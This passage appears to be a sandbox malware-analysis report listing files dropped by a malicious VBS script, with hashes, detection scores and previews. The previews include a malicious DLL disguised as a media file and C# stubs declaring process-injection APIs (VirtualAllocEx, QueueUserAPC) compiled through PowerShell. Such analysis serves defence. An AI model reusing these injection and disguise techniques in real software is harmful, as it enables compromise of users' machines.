                                                                                                                                                  Preview: PK..........rQ.}..............earmark.avchd..8..8N.$....![Hb.bl!..k...C.2.o!..|J......e.%F..Ra.......W}...s~../.u.......y....{...~............8.vv..4...h...?a.`.50...:._._.............8......8....y.`......p........0...@.@.j....{4:..~zz}.=`...M.? .G:..<.#.......u......._0.L.|4z..,.wJ.............r.:...-.?....::.ig.u4......t.t....G...A.......?.j......a.7...F..1#.f...K.N_N..{...4|9...v.X....3..&6:3.T-...:.1.lf.9.F;{..3........o....t2tt..@|....^.:..;..............`.`~....v..54....K.......c....p..K.DX..{4B.].,..a...P.h9....F#H.:..}hM.(.I.WS..Fk^...;H..o.Wc..2..H_...X..u.<....X....Pg.$.g,.~.O.+.s.dI.=.D.1.6.!....9..<6Z....b.h...0>s..*...$..v...N.I...'.S.........G.qck._.k.:....j.N..........K...x..Mk....#ugE...G....R..G...%.d!mk.d.._..."l...>P.3......S.....<....Ws..!.......f.L.$.$.e:.U3.H.T.$.......h-{.ag.}...%D..^.H0.....Z........j.......h.J.G....o......`.d.ee..8y.s../...V......=wm...aT+..&...e+.p_....m8gz9...|..W.h,...2.Q..N.L.......?"..<.@7W.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\FCC.cxx
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):32
                                                                                                                                                  Entropy (8bit):4.413909765557392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:4EA3ppfn:4LZx
                                                                                                                                                  MD5:1F1A0E8B8B957A4E0A9E76DAD9F94896
                                                                                                                                                  SHA1:CC1DDD54FA942B6731653D8B35C1DB90E6DBBD34
                                                                                                                                                  SHA-256:D106B73E76E447E35062AE309FE801B57BBEE7AC193B7ABCF45178ADA7D40BB3
                                                                                                                                                  SHA-512:10505ED4511DC023850C7AB68DDCE48E54581AAC7FD8370BAFE3A839431EFC2E94B24D3B72ED168362388A938348C5216F1199532D356B0F45D2F9D6B3A2753E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ZWJmCemKPVQNwvupbUKEMAALZhNPjPJb
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):89
                                                                                                                                                  Entropy (8bit):4.504686487117389
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oVXVPN+SLSQ4s98JOGXnFPN+SLSQ4mn:o9v+SLZ40q/+SLZ4m
                                                                                                                                                  MD5:8C5B553842846D5B42B8DD958958366E
                                                                                                                                                  SHA1:3D4E98611BD63D569BB942AA9A4455BB8CF2CAA4
                                                                                                                                                  SHA-256:1DCEA56951AE3EA7D10CF9A9FAD39CCE4BDFB93D1E9E6358CE1EE02BB0744B52
                                                                                                                                                  SHA-512:DD49AF22783379440CC4750CC54F20D75E885E7422F147BA97945405D01AA45CBF6F34761912F8AA3711FEEFAD006E361C83741995342D2DE9199097EB9E5EB2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [2020/11/24 20:35:26.769] Latest deploy version: ..[2020/11/24 20:35:26.769] 11.211.2 ..
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESD10C.tmp
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2184
                                                                                                                                                  Entropy (8bit):2.687619956706255
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QhfvNDfHEQhKdNNI+ycuZhNYLakS5kPNnq9qpue9Ep:eJkyKd31ulCa3Gq9l
                                                                                                                                                  MD5:C8360541629129A436F254EF83FE8AB2
                                                                                                                                                  SHA1:010AD75CB0E277003B34B4FC76A4BD2DE880AF61
                                                                                                                                                  SHA-256:84F5EBA422EBD657812C451664990F84F1D551BA7178AC8BC7E2ECD9D2C10D7F
                                                                                                                                                  SHA-512:5405D47C720CB000281F104A30597BF78A866CB3BB6AD0CEA201461C677072D30EF29A8B26E0FA9151AE4C85C7FCF3FBFD2CDCE4284F95B25D9DF8CE341619B1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........R....c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP.................|....6..g..S.0.V..........4.......C:\Users\user\AppData\Local\Temp\RESD10C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESE214.tmp
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2184
                                                                                                                                                  Entropy (8bit):2.69094929733325
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:bZfq6MfaDfHzhKdNNI+ycuZhNqakSiPNnq9qpFe9Ep:bBq6Qg9Kd31ulqa3uq96
                                                                                                                                                  MD5:5C8A774A60412365A8522AFA217FA527
                                                                                                                                                  SHA1:9E4AFF741009101F643CF3267BE21A1E8E65D761
                                                                                                                                                  SHA-256:C6DBEA860A37744ADF845E9916F70B9912123A866969003F834AFF77AC6BCF8F
                                                                                                                                                  SHA-512:46398920203E10925578D31BBA88B574E18B90C01348CE6779D2C6DEFD9FDF89883B1807377B809BA9A7560F3BE71D90C1BD2CBE55C48B1DAE14EBC8B814F09E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........S....c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP..................n$d...!....d..........4.......C:\Users\user\AppData\Local\Temp\RESE214.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tolstoy.3gp
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24
                                                                                                                                                  Entropy (8bit):4.136842188131013
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:L0a3dGn:AOGn
                                                                                                                                                  MD5:DE116F46B1AB756FE5FC714826D9C77C
                                                                                                                                                  SHA1:C0543E108146A86E97F9C92D84550415FF0D07F6
                                                                                                                                                  SHA-256:B83A7A9918FBC774A1CBF2D5C700D86B64D91961728A7BBEC91FF74CE27C6CBA
                                                                                                                                                  SHA-512:FFA07A13C6527B966AB311853D6FF493D9F9EF7B22A530DD52FE06CF41D43880A310F39826DD1D6ED24A54C8C4E0A70E4E2073F52B01BF045715F60833F02FE8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: thzQhBrCvRRGaQnmDrodlryY
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esgihrm0.n4e.psm1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyuxnptu.ebi.ps1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobe.url
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):108
                                                                                                                                                  Entropy (8bit):4.699454908123665
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                                                                                                                  MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                                                                                                                  SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                                                                                                                  SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                                                                                                                  SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bowerbird.m3u
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):58
                                                                                                                                                  Entropy (8bit):5.116264615668023
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:AtNBcCRVqrGZgME1:AKAArcE1
                                                                                                                                                  MD5:FCA5D5C49A23B8614C6F821ABC873200
                                                                                                                                                  SHA1:C6982C28BD133E0317D388EFDFE29CB78A5AB6BA
                                                                                                                                                  SHA-256:9EC7D8CE210B398464E1AE84073DA79284983AEA1AE6AD5985DC77AE95C1C242
                                                                                                                                                  SHA-512:534D876A9BA54CAD210D801582A285D0F9E4385660B6ABFA5C278396644FBD41B1C4F7B2A5FDDB3F6EBC1BDEAE5D99D6E2E34F149697642F4B7E0F0510C641E9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: faHHqDeJlByuQgYuKmjhviPLnmNtvZyJwtONsUcwIeBPlokSmxWvLayqrB
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\earmark.avchd
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):48128
                                                                                                                                                  Entropy (8bit):7.67702661060525
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:Nh66vv4Fgs48pcQqQjeCE+2SfNfAhghqgwZJTpT/6gKffcSapyLeq6pTXY:TrYJ4586SfZKBJT2ffXhkD
                                                                                                                                                  MD5:78B3444199A2932805D85CFDB30AD6FB
                                                                                                                                                  SHA1:A1826A8BDD4AA6FC0BF2157A6063CCA5534A3A46
                                                                                                                                                  SHA-256:66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
                                                                                                                                                  SHA-512:E940BE2888085DE21BA3BF736281D0BEEC6B2B96B7C6D2CD1458951FD20A9ABFA79677393918C7A3877949F6BFC4B33E17200C739AADE0BA33EF4D3F58A0C4ED
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: Metadefender, Detection: 32%, Browse
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 90%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: 0k4Vu1eOEIhU.vbs, Detection: malicious, Browse
                                                                                                                                                  • Filename: 6znkPyTAVN7V.vbs, Detection: malicious, Browse
                                                                                                                                                  • Filename: a7APrVP2o2vA.vbs, Detection: malicious, Browse
                                                                                                                                                  • Filename: 03QKtPTOQpA1.vbs, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......_...........!...I..................... ....@..................................t....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..k...............^_[.1.H)...k.6u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.080277613656948
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjYak7YnqqONPN5Dlq5J:+RI+ycuZhNqakSiPNnqX
                                                                                                                                                  MD5:E2F26E2464F8CEF9212EEC94C7879864
                                                                                                                                                  SHA1:C56029222106B5C125F518B71E2C717CF22FC0A5
                                                                                                                                                  SHA-256:C68CD20770EAAC1423E9FB94784BC43643B7D3A6EC51E3CB0299626067288C51
                                                                                                                                                  SHA-512:BDA50491455E08D10FC5D8C4509BACDC70FAF69C1970F326FEB91A0BB27DB6F75FBDEC8B5A3470504D6254C540C1A6C0DEC6B78C9820161B31204008BE3CC427
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.w.e.o.n.g.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.a.w.e.o.n.g.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.cs
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):414
                                                                                                                                                  Entropy (8bit):5.000775845755204
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                                  MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                                  SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                                  SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                                  SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):369
                                                                                                                                                  Entropy (8bit):5.209786405276214
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fhSAKLJvLVzxs7+AEszIwkn23fhSAKC:p37Lvkmb6KRfpzQRVWZEifpzQRQ
                                                                                                                                                  MD5:8C77A86200603546350CECE81E98B239
                                                                                                                                                  SHA1:7943F1E617BFE675E96A8FE82F6851CB546F75F4
                                                                                                                                                  SHA-256:9406E0709F0FFA7DB595A8B6BED61B283323E293E2A7CA9FFE7529C6185127E7
                                                                                                                                                  SHA-512:4BF58E85F9CCF3D1C749804F8694F837027DDDB2B095B9D024A676A18C2CA90876F37FF14F385D30488C3C144A02D1C2AD19579854E51D8071451BDCEEF0E74E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.cs"
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3584
                                                                                                                                                  Entropy (8bit):2.6221973506838148
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGS31WM+WEei8MTx2qHtLUyBrOOdWtGYwxhtkZfoLuEw7I+ycuZhNqakSiPNnq:63W7qMTxzJUyNnWQYwSJoLs1ulqa3uq
                                                                                                                                                  MD5:6277AE817BE887BAE4104BF88A1E4EBA
                                                                                                                                                  SHA1:519BAF3642EB31CF063EDBABEB2FC5882E9B4EE8
                                                                                                                                                  SHA-256:1337CEADFB47789D6480AD0181373A8154D07383CA18A8D2BC530FE944332573
                                                                                                                                                  SHA-512:D4FC0BA8E4ED8F27B1E22732E9E2A9C70636093E670BBC387101486E52B041986C90BF6456A3BE64B8A7DE3246AC2049B56C620475B2461BDC92C0BBF48AFF2D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.iaweong2.dll.mme.W32.mscor
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.out
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):412
                                                                                                                                                  Entropy (8bit):4.871364761010112
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                  MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                  SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                  SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                  SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.084217463585883
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyLak7Ynqq5kPN5Dlq5J:+RI+ycuZhNYLakS5kPNnqX
                                                                                                                                                  MD5:7C83BA9D10369FC8671FC453DB30E256
                                                                                                                                                  SHA1:2091DFD03932E6B6ED750BC9B9D24B135A29800D
                                                                                                                                                  SHA-256:8CC47F1FD7540043AAB9EEB5E32EBEFA106A7CEFC5ED2FA619C2BC2C085A37BE
                                                                                                                                                  SHA-512:974F4E5B882893C03A176AEAFE025A6E0680E859115B587AC637817241A1DFC3EA4ACF53F762FD09F5769C73F11B11F564F6DEF83B4903E6F32CBDE86C915F2D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.i.l.s.q.r.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.u.i.l.s.q.r.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.0.cs
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):402
                                                                                                                                                  Entropy (8bit):5.038590946267481
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                                  MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                                  SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                                  SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                                  SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):369
                                                                                                                                                  Entropy (8bit):5.23176185506694
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f//0zxs7+AEszIwkn23f/5:p37Lvkmb6KRfMWZEifp
                                                                                                                                                  MD5:8BAF13C3E309746C713AA7817693CD43
                                                                                                                                                  SHA1:48260A7C2D7D22E8BCFC2CAB9290B74EE0403469
                                                                                                                                                  SHA-256:1E93899B1BB2569893A66F4BD6FFFF52014A25B40B29F3292BE9039BCC6CC01C
                                                                                                                                                  SHA-512:FDABA0FC8E08AE769441B0A1A6AEB50ACE89C8E30C69BB0228133CE5A64F5411585D26CD93109E319B1775CA8E62946D9D3E7F9126EC87C509E6D48A8992354B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.0.cs"
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3584
                                                                                                                                                  Entropy (8bit):2.600581399483191
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSZW/W2Dg85xL/XsB4ziL4zqhRqPPtkZf8Jn+II+ycuZhNYLakS5kPNnq:6hWb5xL/OJbuuJ89n1ulCa3Gq
                                                                                                                                                  MD5:41FF6416DD014DC469F4D5FA82BEA303
                                                                                                                                                  SHA1:62ABC2A9AE360ACEFE3E91173F03F6A97AAF2102
                                                                                                                                                  SHA-256:B98A1E1E7C9C12F2057D0B067ABE9F7D93E6C1F40995BE919ED3B80682663E69
                                                                                                                                                  SHA-512:16599A264F061D5A5C756AF5C9DC932C213611A434A8288EA47DD352097A47AEEDC5DF551BFA34E6B3E025DDC8DAA7E56716C1258EBA8184919D90C11AFC9324
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.xuilsqrn.dll.tba.W32.mscorlib.Syst
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.out
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):412
                                                                                                                                                  Entropy (8bit):4.871364761010112
                                                                                                                                                  Encrypted:false
